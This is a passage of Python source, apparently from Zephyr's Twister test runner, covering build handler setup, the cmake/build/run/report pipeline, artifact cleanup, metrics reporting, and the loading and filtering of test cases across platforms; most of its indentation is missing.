defconfig_path = os.path.join(self.build_dir, "zephyr", ".config")
with open(defconfig_path, "r") as fp:
defconfig = {}
for line in fp.readlines():
m = self.config_re.match(line)
if not m:
if line.strip() and not line.startswith("#"):
sys.stderr.write("Unrecognized line %s\n" % line)
continue
defconfig[m.group(1)] = m.group(2).strip()
self.defconfig = defconfig
cmake_conf = {}
try:
cache = CMakeCache.from_file(cmake_cache_path)
except FileNotFoundError:
cache = {}
for k in iter(cache):
cmake_conf[k.name] = k.value
self.cmake_cache = cmake_conf
filter_data = {
"ARCH": self.platform.arch,
"PLATFORM": self.platform.name
}
filter_data.update(os.environ)
filter_data.update(self.defconfig)
filter_data.update(self.cmake_cache)
edt_pickle = os.path.join(self.build_dir, "zephyr", "edt.pickle")
if self.testcase and self.testcase.tc_filter:
try:
if os.path.exists(edt_pickle):
with open(edt_pickle, 'rb') as f:
edt = pickle.load(f)
else:
edt = None
res = expr_parser.parse(self.testcase.tc_filter, filter_data, edt)
except (ValueError, SyntaxError) as se:
sys.stderr.write(
"Failed processing %s\n" % self.testcase.yamlfile)
raise se
if not res:
return {os.path.join(self.platform.name, self.testcase.name): True}
else:
return {os.path.join(self.platform.name, self.testcase.name): False}
else:
self.platform.filter_data = filter_data
return filter_data
class ProjectBuilder(FilterBuilder):
def __init__(self, suite, instance, **kwargs):
super().__init__(instance.testcase, instance.platform, instance.testcase.source_dir, instance.build_dir)
self.log = "build.log"
self.instance = instance
self.suite = suite
self.filtered_tests = 0
self.lsan = kwargs.get('lsan', False)
self.asan = kwargs.get('asan', False)
self.ubsan = kwargs.get('ubsan', False)
self.valgrind = kwargs.get('valgrind', False)
self.extra_args = kwargs.get('extra_args', [])
self.device_testing = kwargs.get('device_testing', False)
self.cmake_only = kwargs.get('cmake_only', False)
self.cleanup = kwargs.get('cleanup', False)
self.coverage = kwargs.get('coverage', False)
self.inline_logs = kwargs.get('inline_logs', False)
self.generator = kwargs.get('generator', None)
self.generator_cmd = kwargs.get('generator_cmd', None)
self.verbose = kwargs.get('verbose', None)
self.warnings_as_errors = kwargs.get('warnings_as_errors', True)
self.overflow_as_errors = kwargs.get('overflow_as_errors', False)
self.suite_name_check = kwargs.get('suite_name_check', True)
@staticmethod
def log_info(filename, inline_logs):
filename = os.path.abspath(os.path.realpath(filename))
if inline_logs:
logger.info("{:-^100}".format(filename))
try:
with open(filename) as fp:
data = fp.read()
except Exception as e:
data = "Unable to read log data (%s)\n" % (str(e))
logger.error(data)
logger.info("{:-^100}".format(filename))
else:
logger.error("see: " + Fore.YELLOW + filename + Fore.RESET)
def log_info_file(self, inline_logs):
build_dir = self.instance.build_dir
h_log = "{}/handler.log".format(build_dir)
b_log = "{}/build.log".format(build_dir)
v_log = "{}/valgrind.log".format(build_dir)
d_log = "{}/device.log".format(build_dir)
if os.path.exists(v_log) and "Valgrind" in self.instance.reason:
self.log_info("{}".format(v_log), inline_logs)
elif os.path.exists(h_log) and os.path.getsize(h_log) > 0:
self.log_info("{}".format(h_log), inline_logs)
elif os.path.exists(d_log) and os.path.getsize(d_log) > 0:
self.log_info("{}".format(d_log), inline_logs)
else:
self.log_info("{}".format(b_log), inline_logs)
def setup_handler(self):
instance = self.instance
args = []
# FIXME: Needs simplification
if instance.platform.simulation == "qemu":
instance.handler = QEMUHandler(instance, "qemu")
args.append("QEMU_PIPE=%s" % instance.handler.get_fifo())
instance.handler.call_make_run = True
elif instance.testcase.type == "unit":
instance.handler = BinaryHandler(instance, "unit")
instance.handler.binary = os.path.join(instance.build_dir, "testbinary")
if self.coverage:
args.append("COVERAGE=1")
elif instance.platform.type == "native":
handler = BinaryHandler(instance, "native")
handler.asan = self.asan
handler.valgrind = self.valgrind
handler.lsan = self.lsan
handler.ubsan = self.ubsan
handler.coverage = self.coverage
handler.binary = os.path.join(instance.build_dir, "zephyr", "zephyr.exe")
instance.handler = handler
elif instance.platform.simulation == "renode":
if find_executable("renode"):
instance.handler = BinaryHandler(instance, "renode")
instance.handler.pid_fn = os.path.join(instance.build_dir, "renode.pid")
instance.handler.call_make_run = True
elif instance.platform.simulation == "tsim":
instance.handler = BinaryHandler(instance, "tsim")
instance.handler.call_make_run = True
elif self.device_testing:
instance.handler = DeviceHandler(instance, "device")
instance.handler.coverage = self.coverage
elif instance.platform.simulation == "nsim":
if find_executable("nsimdrv"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "mdb-nsim":
if find_executable("mdb"):
instance.handler = BinaryHandler(instance, "nsim")
instance.handler.call_make_run = True
elif instance.platform.simulation == "armfvp":
instance.handler = BinaryHandler(instance, "armfvp")
instance.handler.call_make_run = True
elif instance.platform.simulation == "xt-sim":
instance.handler = BinaryHandler(instance, "xt-sim")
instance.handler.call_make_run = True
if instance.handler:
instance.handler.args = args
instance.handler.generator_cmd = self.generator_cmd
instance.handler.generator = self.generator
instance.handler.suite_name_check = self.suite_name_check
def process(self, pipeline, done, message, lock, results):
op = message.get('op')
if not self.instance.handler:
self.setup_handler()
# The build process, call cmake and build with configured generator
if op == "cmake":
res = self.cmake()
if self.instance.status in ["failed", "error"]:
pipeline.put({"op": "report", "test": self.instance})
elif self.cmake_only:
if self.instance.status is None:
self.instance.status = "passed"
pipeline.put({"op": "report", "test": self.instance})
else:
if self.instance.name in res['filter'] and res['filter'][self.instance.name]:
logger.debug("filtering %s" % self.instance.name)
self.instance.status = "skipped"
self.instance.reason = "filter"
results.skipped_runtime += 1
for case in self.instance.testcase.cases:
self.instance.results.update({case: 'SKIP'})
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "build", "test": self.instance})
elif op == "build":
logger.debug("build test: %s" % self.instance.name)
res = self.build()
if not res:
self.instance.status = "error"
self.instance.reason = "Build Failure"
pipeline.put({"op": "report", "test": self.instance})
else:
# Count skipped cases during build, for example
# due to ram/rom overflow.
inst = res.get("instance", None)
if inst and inst.status == "skipped":
results.skipped_runtime += 1
if res.get('returncode', 1) > 0:
pipeline.put({"op": "report", "test": self.instance})
else:
pipeline.put({"op": "gather_metrics", "test": self.instance})
elif op == "gather_metrics":
self.gather_metrics(self.instance)
if self.instance.run and self.instance.handler:
pipeline.put({"op": "run", "test": self.instance})
else:
pipeline.put({"op": "report", "test": self.instance})
# Run the generated binary using one of the supported handlers
elif op == "run":
logger.debug("run test: %s" % self.instance.name)
self.run()
self.instance.status, _ = self.instance.handler.get_state()
logger.debug(f"run status: {self.instance.name} {self.instance.status}")
# to make it work with pickle
self.instance.handler.thread = None
self.instance.handler.suite = None
pipeline.put({
"op": "report",
"test": self.instance,
"status": self.instance.status,
"reason": self.instance.reason
}
)
# Report results and output progress to screen
elif op == "report":
with lock:
done.put(self.instance)
self.report_out(results)
if self.cleanup and not self.coverage and self.instance.status == "passed":
pipeline.put({
"op": "cleanup",
"test": self.instance
})
elif op == "cleanup":
if self.device_testing:
self.cleanup_device_testing_artifacts()
else:
self.cleanup_artifacts()
def cleanup_artifacts(self, additional_keep=[]):
logger.debug("Cleaning up {}".format(self.instance.build_dir))
allow = [
'zephyr/.config',
'handler.log',
'build.log',
'device.log',
'recording.csv',
]
allow += additional_keep
allow = [os.path.join(self.instance.build_dir, file) for file in allow]
for dirpath, dirnames, filenames in os.walk(self.instance.build_dir, topdown=False):
for name in filenames:
path = os.path.join(dirpath, name)
if path not in allow:
os.remove(path)
# Remove empty directories and symbolic links to directories
for dir in dirnames:
path = os.path.join(dirpath, dir)
if os.path.islink(path):
os.remove(path)
elif not os.listdir(path):
os.rmdir(path)
def cleanup_device_testing_artifacts(self):
logger.debug("Cleaning up for Device Testing {}".format(self.instance.build_dir))
sanitizelist = [
'CMakeCache.txt',
'zephyr/runners.yaml',
]
keep = [
'zephyr/zephyr.hex',
'zephyr/zephyr.bin',
'zephyr/zephyr.elf',
]
keep += sanitizelist
self.cleanup_artifacts(keep)
# sanitize paths so files are relocatable
for file in sanitizelist:
file = os.path.join(self.instance.build_dir, file)
with open(file, "rt") as fin:
data = fin.read()
data = data.replace(canonical_zephyr_base+"/", "")
with open(file, "wt") as fin:
fin.write(data)
def report_out(self, results):
total_to_do = results.total
total_tests_width = len(str(total_to_do))
results.done += 1
instance = self.instance
if instance.status in ["error", "failed", "timeout", "flash_error"]:
if instance.status == "error":
results.error += 1
results.failed += 1
if self.verbose:
status = Fore.RED + "FAILED " + Fore.RESET + instance.reason
else:
print("")
logger.error(
"{:<25} {:<50} {}FAILED{}: {}".format(
instance.platform.name,
instance.testcase.name,
Fore.RED,
Fore.RESET,
instance.reason))
if not self.verbose:
self.log_info_file(self.inline_logs)
elif instance.status == "skipped":
status = Fore.YELLOW + "SKIPPED" + Fore.RESET
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
elif instance.status == "passed":
status = Fore.GREEN + "PASSED" + Fore.RESET
results.passed += 1
for res in instance.results.values():
if res == 'SKIP':
results.skipped_cases += 1
else:
logger.debug(f"Unknown status = {instance.status}")
status = Fore.YELLOW + "UNKNOWN" + Fore.RESET
if self.verbose:
if self.cmake_only:
more_info = "cmake"
elif instance.status == "skipped":
more_info = instance.reason
else:
if instance.handler and instance.run:
more_info = instance.handler.type_str
htime = instance.handler.duration
if htime:
more_info += " {:.3f}s".format(htime)
else:
more_info = "build"
logger.info("{:>{}}/{} {:<25} {:<50} {} ({})".format(
results.done + results.skipped_filter, total_tests_width, total_to_do , instance.platform.name,
instance.testcase.name, status, more_info))
if instance.status in ["error", "failed", "timeout"]:
self.log_info_file(self.inline_logs)
else:
completed_perc = 0
if total_to_do > 0:
completed_perc = int((float(results.done + results.skipped_filter) / total_to_do) * 100)
sys.stdout.write("\rINFO - Total complete: %s%4d/%4d%s %2d%% skipped: %s%4d%s, failed: %s%4d%s" % (
Fore.GREEN,
results.done + results.skipped_filter,
total_to_do,
Fore.RESET,
completed_perc,
Fore.YELLOW if results.skipped_configs > 0 else Fore.RESET,
results.skipped_filter + results.skipped_runtime,
Fore.RESET,
Fore.RED if results.failed > 0 else Fore.RESET,
results.failed,
Fore.RESET
)
)
sys.stdout.flush()
def cmake(self):
instance = self.instance
args = self.testcase.extra_args[:]
args += self.extra_args
if instance.handler:
args += instance.handler.args
# merge overlay files into one variable
def extract_overlays(args):
re_overlay = re.compile('OVERLAY_CONFIG=(.*)')
other_args = []
overlays = []
for arg in args:
match = re_overlay.search(arg)
if match:
overlays.append(match.group(1).strip('\'"'))
else:
other_args.append(arg)
args[:] = other_args
return overlays
overlays = extract_overlays(args)
if os.path.exists(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf")):
overlays.append(os.path.join(instance.build_dir,
"twister", "testcase_extra.conf"))
if overlays:
args.append("OVERLAY_CONFIG=\"%s\"" % (" ".join(overlays)))
res = self.run_cmake(args)
return res
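    # Illustrative example (values are hypothetical): with extra args such as
    #   ['OVERLAY_CONFIG=overlay-foo.conf', 'CONFIG_X=y']
    # extract_overlays() pulls out 'overlay-foo.conf' and leaves ['CONFIG_X=y'] in args;
    # if <build_dir>/twister/testcase_extra.conf also exists, the appended argument becomes
    #   OVERLAY_CONFIG="overlay-foo.conf <build_dir>/twister/testcase_extra.conf"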
def build(self):
res = self.run_build(['--build', self.build_dir])
return res
def run(self):
instance = self.instance
if instance.handler:
if instance.handler.type_str == "device":
instance.handler.suite = self.suite
instance.handler.handle()
sys.stdout.flush()
def gather_metrics(self, instance):
if self.suite.enable_size_report and not self.suite.cmake_only:
self.calc_one_elf_size(instance)
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
@staticmethod
def calc_one_elf_size(instance):
if instance.status not in ["error", "failed", "skipped"]:
if instance.platform.type != "native":
size_calc = instance.calculate_sizes()
instance.metrics["ram_size"] = size_calc.get_ram_size()
instance.metrics["rom_size"] = size_calc.get_rom_size()
instance.metrics["unrecognized"] = size_calc.unrecognized_sections()
else:
instance.metrics["ram_size"] = 0
instance.metrics["rom_size"] = 0
instance.metrics["unrecognized"] = []
instance.metrics["handler_time"] = instance.handler.duration if instance.handler else 0
class TestSuite(DisablePyTestCollectionMixin):
config_re = re.compile('(CONFIG_[A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
dt_re = re.compile('([A-Za-z0-9_]+)[=]\"?([^\"]*)\"?$')
tc_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "testcase-schema.yaml"))
quarantine_schema = scl.yaml_load(
os.path.join(ZEPHYR_BASE,
"scripts", "schemas", "twister", "quarantine-schema.yaml"))
testcase_valid_keys = {"tags": {"type": "set", "required": False},
"type": {"type": "str", "default": "integration"},
"extra_args": {"type": "list"},
"extra_configs": {"type": "list"},
"build_only": {"type": "bool", "default": False},
"build_on_all": {"type": "bool", "default": False},
"skip": {"type": "bool", "default": False},
"slow": {"type": "bool", "default": False},
"timeout": {"type": "int", "default": 60},
"min_ram": {"type": "int", "default": 8},
"modules": {"type": "list", "default": []},
"depends_on": {"type": "set"},
"min_flash": {"type": "int", "default": 32},
"arch_allow": {"type": "set"},
"arch_exclude": {"type": "set"},
"extra_sections": {"type": "list", "default": []},
"integration_platforms": {"type": "list", "default": []},
"platform_exclude": {"type": "set"},
"platform_allow": {"type": "set"},
"toolchain_exclude": {"type": "set"},
"toolchain_allow": {"type": "set"},
"filter": {"type": "str"},
"harness": {"type": "str"},
"harness_config": {"type": "map", "default": {}}
}
RELEASE_DATA = os.path.join(ZEPHYR_BASE, "scripts", "release",
"twister_last_release.csv")
SAMPLE_FILENAME = 'sample.yaml'
TESTCASE_FILENAME = 'testcase.yaml'
def __init__(self, board_root_list=[], testcase_roots=[], outdir=None):
self.roots = testcase_roots
if not isinstance(board_root_list, list):
self.board_roots = [board_root_list]
else:
self.board_roots = board_root_list
# Testsuite Options
self.coverage_platform = []
self.build_only = False
self.cmake_only = False
self.cleanup = False
self.enable_slow = False
self.device_testing = False
self.fixtures = []
self.enable_coverage = False
self.enable_ubsan = False
self.enable_lsan = False
self.enable_asan = False
self.enable_valgrind = False
self.extra_args = []
self.inline_logs = False
self.enable_sizes_report = False
self.west_flash = None
self.west_runner = None
self.generator = None
self.generator_cmd = None
self.warnings_as_errors = True
self.overflow_as_errors = False
self.quarantine_verify = False
self.retry_build_errors = False
self.suite_name_check = True
# Keep track of which test cases we've filtered out and why
self.testcases = {}
self.quarantine = {}
self.platforms = []
self.platform_names = []
self.selected_platforms = []
self.filtered_platforms = []
self.default_platforms = []
self.outdir = os.path.abspath(outdir)
self.discards = {}
self.load_errors = 0
self.instances = dict()
self.total_platforms = 0
self.start_time = 0
self.duration = 0
self.warnings = 0
# hardcoded for now
self.duts = []
# run integration tests only
self.integration = False
        # used when creating shorter build paths
self.link_dir_counter = 0
self.pipeline = None
self.version = "NA"
self.modules = []
def check_zephyr_version(self):
try:
subproc = subprocess.run(["git", "describe", "--abbrev=12", "--always"],
stdout=subprocess.PIPE,
universal_newlines=True,
cwd=ZEPHYR_BASE)
if subproc.returncode == 0:
self.version = subproc.stdout.strip()
logger.info(f"Zephyr version: {self.version}")
except OSError:
logger.info("Cannot read zephyr version.")
def get_platform_instances(self, platform):
filtered_dict = {k:v for k,v in self.instances.items() if k.startswith(platform + os.sep)}
return filtered_dict
def config(self):
logger.info("coverage platform: {}".format(self.coverage_platform))
# Debug Functions
@staticmethod
def info(what):
sys.stdout.write(what + "\n")
sys.stdout.flush()
def update_counting(self, results=None):
for instance in self.instances.values():
results.cases += len(instance.testcase.cases)
if instance.status == 'skipped':
results.skipped_filter += 1
results.skipped_configs += 1
results.skipped_cases += len(instance.testcase.cases)
def compare_metrics(self, filename):
# name, datatype, lower results better
interesting_metrics = [("ram_size", int, True),
("rom_size", int, True)]
if not os.path.exists(filename):
logger.error("Cannot compare metrics, %s not found" % filename)
return []
results = []
saved_metrics = {}
with open(filename) as fp:
cr = csv.DictReader(fp)
for row in cr:
d = {}
for m, _, _ in interesting_metrics:
d[m] = row[m]
saved_metrics[(row["test"], row["platform"])] = d
for instance in self.instances.values():
mkey = (instance.testcase.name, instance.platform.name)
if mkey not in saved_metrics:
continue
sm = saved_metrics[mkey]
for metric, mtype, lower_better in interesting_metrics:
if metric not in instance.metrics:
continue
if sm[metric] == "":
continue
delta = instance.metrics.get(metric, 0) - mtype(sm[metric])
if delta == 0:
continue
results.append((instance, metric, instance.metrics.get(metric, 0), delta,
lower_better))
return results
def footprint_reports(self, report, show_footprint, all_deltas,
footprint_threshold, last_metrics):
if not report:
return
logger.debug("running footprint_reports")
deltas = self.compare_metrics(report)
warnings = 0
if deltas and show_footprint:
for i, metric, value, delta, lower_better in deltas:
if not all_deltas and ((delta < 0 and lower_better) or
(delta > 0 and not lower_better)):
continue
percentage = 0
if value > delta:
percentage = (float(delta) / float(value - delta))
if not all_deltas and (percentage < (footprint_threshold / 100.0)):
continue
logger.info("{:<25} {:<60} {}{}{}: {} {:<+4}, is now {:6} {:+.2%}".format(
i.platform.name, i.testcase.name, Fore.YELLOW,
"INFO" if all_deltas else "WARNING", Fore.RESET,
metric, delta, value, percentage))
warnings += 1
if warnings:
logger.warning("Deltas based on metrics from last %s" %
("release" if not last_metrics else "run"))
def summary(self, results, unrecognized_sections):
failed = 0
run = 0
for instance in self.instances.values():
if instance.status == "failed":
failed += 1
elif instance.metrics.get("unrecognized") and not unrecognized_sections:
logger.error("%sFAILED%s: %s has unrecognized binary sections: %s" %
(Fore.RED, Fore.RESET, instance.name,
str(instance.metrics.get("unrecognized", []))))
failed += 1
if instance.metrics.get('handler_time', None):
run += 1
if results.total and results.total != results.skipped_configs:
pass_rate = (float(results.passed) / float(results.total - results.skipped_configs))
else:
pass_rate = 0
logger.info(
"{}{} of {}{} test configurations passed ({:.2%}), {}{}{} failed, {} skipped with {}{}{} warnings in {:.2f} seconds".format(
Fore.RED if failed else Fore.GREEN,
results.passed,
results.total,
Fore.RESET,
pass_rate,
Fore.RED if results.failed else Fore.RESET,
results.failed,
Fore.RESET,
results.skipped_configs,
Fore.YELLOW if self.warnings else Fore.RESET,
self.warnings,
Fore.RESET,
self.duration))
self.total_platforms = len(self.platforms)
# if we are only building, do not report about tests being executed.
if self.platforms and not self.build_only:
logger.info("In total {} test cases were executed, {} skipped on {} out of total {} platforms ({:02.2f}%)".format(
results.cases - results.skipped_cases,
results.skipped_cases,
len(self.filtered_platforms),
self.total_platforms,
(100 * len(self.filtered_platforms) / len(self.platforms))
))
logger.info(f"{Fore.GREEN}{run}{Fore.RESET} test configurations executed on platforms, \
{Fore.RED}{results.total - run - results.skipped_configs}{Fore.RESET} test configurations were only built.")
def save_reports(self, name, suffix, report_dir, no_update, release, only_failed, platform_reports, json_report, report_skipped):
if not self.instances:
return
logger.info("Saving reports...")
if name:
report_name = name
else:
report_name = "twister"
if report_dir:
os.makedirs(report_dir, exist_ok=True)
filename = os.path.join(report_dir, report_name)
outdir = report_dir
else:
filename = os.path.join(self.outdir, report_name)
outdir = self.outdir
if suffix:
filename = "{}_{}".format(filename, suffix)
if not no_update:
self.xunit_report(filename + ".xml", full_report=False,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.xunit_report(filename + "_report.xml", full_report=True,
append=only_failed, version=self.version, report_skipped=report_skipped)
self.csv_report(filename + ".csv")
if json_report:
self.json_report(filename + ".json", append=only_failed, version=self.version)
if platform_reports:
self.target_report(outdir, suffix, append=only_failed)
if self.discards:
self.discard_report(filename + "_discard.csv")
if release:
self.csv_report(self.RELEASE_DATA)
def add_configurations(self):
for board_root in self.board_roots:
board_root = os.path.abspath(board_root)
logger.debug("Reading platform configuration files under %s..." %
board_root)
for file in glob.glob(os.path.join(board_root, "*", "*", "*.yaml")):
try:
platform = Platform()
platform.load(file)
if platform.name in [p.name for p in self.platforms]:
logger.error(f"Duplicate platform {platform.name} in {file}")
raise Exception(f"Duplicate platform identifier {platform.name} found")
if platform.twister:
self.platforms.append(platform)
if platform.default:
self.default_platforms.append(platform.name)
except RuntimeError as e:
logger.error("E: %s: can't load: %s" % (file, e))
self.load_errors += 1
self.platform_names = [p.name for p in self.platforms]
def get_all_tests(self):
tests = []
for _, tc in self.testcases.items():
for case in tc.cases:
tests.append(case)
return tests
@staticmethod
def get_toolchain():
toolchain_script = Path(ZEPHYR_BASE) / Path('cmake/modules/verify-toolchain.cmake')
result = CMake.run_cmake_script([toolchain_script, "FORMAT=json"])
try:
if result['returncode']:
raise TwisterRuntimeError(f"E: {result['returnmsg']}")
except Exception as e:
print(str(e))
sys.exit(2)
toolchain = json.loads(result['stdout'])['ZEPHYR_TOOLCHAIN_VARIANT']
logger.info(f"Using '{toolchain}' toolchain.")
return toolchain
def add_testcases(self, testcase_filter=[]):
for root in self.roots:
root = os.path.abspath(root)
logger.debug("Reading test case configuration files under %s..." % root)
for dirpath, _, filenames in os.walk(root, topdown=True):
if self.SAMPLE_FILENAME in filenames:
filename = self.SAMPLE_FILENAME
elif self.TESTCASE_FILENAME in filenames:
filename = self.TESTCASE_FILENAME
else:
continue
logger.debug("Found possible test case in " + dirpath)
tc_path = os.path.join(dirpath, filename)
try:
parsed_data = TwisterConfigParser(tc_path, self.tc_schema)
parsed_data.load()
tc_path = os.path.dirname(tc_path)
workdir = os.path.relpath(tc_path, root)
for name in parsed_data.tests.keys():
tc = TestCase(root, workdir, name)
tc_dict = parsed_data.get_test(name, self.testcase_valid_keys)
tc.source_dir = tc_path
tc.yamlfile = tc_path
tc.type = tc_dict["type"]
tc.tags = tc_dict["tags"]
tc.extra_args = tc_dict["extra_args"]
tc.extra_configs = tc_dict["extra_configs"]
tc.arch_allow = tc_dict["arch_allow"]
tc.arch_exclude = tc_dict["arch_exclude"]
tc.skip = tc_dict["skip"]
tc.platform_exclude = tc_dict["platform_exclude"]
tc.platform_allow = tc_dict["platform_allow"]
tc.toolchain_exclude = tc_dict["toolchain_exclude"]
tc.toolchain_allow = tc_dict["toolchain_allow"]
tc.tc_filter = tc_dict["filter"]
tc.timeout = tc_dict["timeout"]
tc.harness = tc_dict["harness"]
tc.harness_config = tc_dict["harness_config"]
if tc.harness == 'console' and not tc.harness_config:
raise Exception('Harness config error: console harness defined without a configuration.')
tc.build_only = tc_dict["build_only"]
tc.build_on_all = tc_dict["build_on_all"]
tc.slow = tc_dict["slow"]
tc.min_ram = tc_dict["min_ram"]
tc.modules = tc_dict["modules"]
tc.depends_on = tc_dict["depends_on"]
tc.min_flash = tc_dict["min_flash"]
tc.extra_sections = tc_dict["extra_sections"]
tc.integration_platforms = tc_dict["integration_platforms"]
tc.parse_subcases(tc_path)
if testcase_filter:
if tc.name and tc.name in testcase_filter:
self.testcases[tc.name] = tc
else:
self.testcases[tc.name] = tc
except Exception as e:
logger.error("%s: can't load (skipping): %s" % (tc_path, e))
self.load_errors += 1
return len(self.testcases)
def get_platform(self, name):
selected_platform = None
for platform in self.platforms:
if platform.name == name:
selected_platform = platform
break
return selected_platform
def load_quarantine(self, file):
"""
Loads quarantine list from the given yaml file. Creates a dictionary
        of all test configurations (platform + scenario: comment) that shall be
        skipped due to quarantine.
"""
# Load yaml into quarantine_yaml
quarantine_yaml = scl.yaml_load_verify(file, self.quarantine_schema)
# Create quarantine_list with a product of the listed
# platforms and scenarios for each entry in quarantine yaml
quarantine_list = []
for quar_dict in quarantine_yaml:
if quar_dict['platforms'][0] == "all":
plat = self.platform_names
else:
plat = quar_dict['platforms']
comment = quar_dict.get('comment', "NA")
quarantine_list.append([{".".join([p, s]): comment}
for p in plat for s in quar_dict['scenarios']])
# Flatten the quarantine_list
quarantine_list = [it for sublist in quarantine_list for it in sublist]
# Change quarantine_list into a dictionary
for d in quarantine_list:
self.quarantine.update(d)
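    # Illustrative quarantine file entry (names are hypothetical), matching the keys
    # consumed above:
    #   - scenarios:
    #       - sample.basic.helloworld
    #     platforms:
    #       - all
    #     comment: "flaky on emulators"
    # With platforms == ["all"] the entry expands to one "<platform>.<scenario>: comment"
    # pair per known platform name.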
def load_from_file(self, file, filter_status=[], filter_platform=[]):
try:
with open(file, "r") as fp:
cr = csv.DictReader(fp)
instance_list = []
for row in cr:
if row["status"] in filter_status:
continue
test = row["test"]
platform = self.get_platform(row["platform"])
if filter_platform and platform.name not in filter_platform:
continue
instance = TestInstance(self.testcases[test], platform, self.outdir)
if "run_id" in row and row["run_id"] != "na":
instance.run_id = row["run_id"]
if self.device_testing:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
instance.create_overlay(platform, self.enable_asan, self.enable_ubsan, self.enable_coverage, self.coverage_platform)
instance_list.append(instance)
self.add_instances(instance_list)
except KeyError as e:
logger.error("Key error while parsing tests file.({})".format(str(e)))
sys.exit(2)
except FileNotFoundError as e:
logger.error("Couldn't find input file with list of tests. ({})".format(e))
sys.exit(2)
def apply_filters(self, **kwargs):
toolchain = self.get_toolchain()
discards = {}
platform_filter = kwargs.get('platform')
exclude_platform = kwargs.get('exclude_platform', [])
testcase_filter = kwargs.get('run_individual_tests', [])
arch_filter = kwargs.get('arch')
tag_filter = kwargs.get('tag')
exclude_tag = kwargs.get('exclude_tag')
all_filter = kwargs.get('all')
runnable = kwargs.get('runnable')
force_toolchain = kwargs.get('force_toolchain')
force_platform = kwargs.get('force_platform')
emu_filter = kwargs.get('emulation_only')
logger.debug("platform filter: " + str(platform_filter))
logger.debug(" arch_filter: " + str(arch_filter))
logger.debug(" tag_filter: " + str(tag_filter))
logger.debug(" exclude_tag: " + str(exclude_tag))
default_platforms = False
emulation_platforms = False
if all_filter:
logger.info("Selecting all possible platforms per test case")
            # When --all is used, any --platform arguments are ignored
platform_filter = []
elif not platform_filter and not emu_filter:
logger.info("Selecting default platforms per test case")
default_platforms = True
elif emu_filter:
logger.info("Selecting emulation platforms per test case")
emulation_platforms = True
if platform_filter:
self.verify_platforms_existence(platform_filter, f"platform_filter")
platforms = list(filter(lambda p: p.name in platform_filter, self.platforms))
elif emu_filter:
platforms = list(filter(lambda p: p.simulation != 'na', self.platforms))
elif arch_filter:
platforms = list(filter(lambda p: p.arch in arch_filter, self.platforms))
elif default_platforms:
platforms = list(filter(lambda p: p.default, self.platforms))
else:
platforms = self.platforms
logger.info("Building initial testcase list...")
for tc_name, tc in self.testcases.items():
if tc.build_on_all and not platform_filter:
platform_scope = self.platforms
elif tc.integration_platforms and self.integration:
self.verify_platforms_existence(
tc.integration_platforms, f"{tc_name} - integration_platforms")
platform_scope = list(filter(lambda item: item.name in tc.integration_platforms, \
self.platforms))
else:
platform_scope = platforms
integration = self.integration and tc.integration_platforms
# If there isn't any overlap between the platform_allow list and the platform_scope
# we set the scope to the platform_allow list
if tc.platform_allow and not platform_filter and not integration:
self.verify_platforms_existence(
tc.platform_allow, f"{tc_name} - platform_allow")
a = set(platform_scope)
b = set(filter(lambda item: item.name in tc.platform_allow, self.platforms))
c = a.intersection(b)
if not c:
platform_scope = list(filter(lambda item: item.name in tc.platform_allow, \
self.platforms))
# list of instances per testcase, aka configurations.
instance_list = []
for plat in platform_scope:
instance = TestInstance(tc, plat, self.outdir)
if runnable:
tfilter = 'runnable'
else:
tfilter = 'buildable'
instance.run = instance.check_runnable(
self.enable_slow,
tfilter,
self.fixtures
)
for t in tc.cases:
instance.results[t] = None
if runnable and self.duts:
for h in self.duts:
if h.platform == plat.name:
if tc.harness_config.get('fixture') in h.fixtures:
instance.run = True
if not force_platform and plat.name in exclude_platform:
discards[instance] = discards.get(instance, "Platform is excluded on command line.")
if (plat.arch == "unit") != (tc.type == "unit"):
# Discard silently
continue
if tc.modules and self.modules:
if not set(tc.modules).issubset(set(self.modules)):
discards[instance] = discards.get(instance, f"one or more required module not available: {','.join(tc.modules)}")
if runnable and not instance.run:
discards[instance] = discards.get(instance, "Not runnable on device")
if self.integration and tc.integration_platforms and plat.name not in tc.integration_platforms:
discards[instance] = discards.get(instance, "Not part of integration platforms")
if tc.skip:
discards[instance] = discards.get(instance, "Skip filter")
if tag_filter and not tc.tags.intersection(tag_filter):
discards[instance] = discards.get(instance, "Command line testcase tag filter")
if exclude_tag and tc.tags.intersection(exclude_tag):
discards[instance] = discards.get(instance, "Command line testcase exclude filter")
if testcase_filter and tc_name not in testcase_filter:
discards[instance] = discards.get(instance, "Testcase name filter")
if arch_filter and plat.arch not in arch_filter:
discards[instance] = discards.get(instance, "Command line testcase arch filter")
if not force_platform:
if tc.arch_allow and plat.arch not in tc.arch_allow:
discards[instance] = discards.get(instance, "Not in test case arch allow list")
if tc.arch_exclude and plat.arch in tc.arch_exclude:
discards[instance] = discards.get(instance, "In test case arch exclude")
if tc.platform_exclude and plat.name in tc.platform_exclude:
discards[instance] = discards.get(instance, "In test case platform exclude")
if tc.toolchain_exclude and toolchain in tc.toolchain_exclude:
discards[instance] = discards.get(instance, "In test case toolchain exclude")
if platform_filter and plat.name not in platform_filter:
discards[instance] = discards.get(instance, "Command line platform filter")
if tc.platform_allow and plat.name not in tc.platform_allow:
discards[instance] = discards.get(instance, "Not in testcase platform allow list")
if tc.toolchain_allow and toolchain not in tc.toolchain_allow:
discards[instance] = discards.get(instance, "Not in testcase toolchain allow list")
if not plat.env_satisfied:
discards[instance] = discards.get(instance, "Environment ({}) not satisfied".format(", ".join(plat.env)))
if not force_toolchain \
and toolchain and (toolchain not in plat.supported_toolchains) \
and "host" not in plat.supported_toolchains \
and tc.type != 'unit':
discards[instance] = discards.get(instance, "Not supported by the toolchain")
if plat.ram < tc.min_ram:
discards[instance] = discards.get(instance, "Not enough RAM")
if tc.depends_on:
dep_intersection = tc.depends_on.intersection(set(plat.supported))
if dep_intersection != set(tc.depends_on):
discards[instance] = discards.get(instance, "No hardware support")
if plat.flash < tc.min_flash:
discards[instance] = discards.get(instance, "Not enough FLASH")
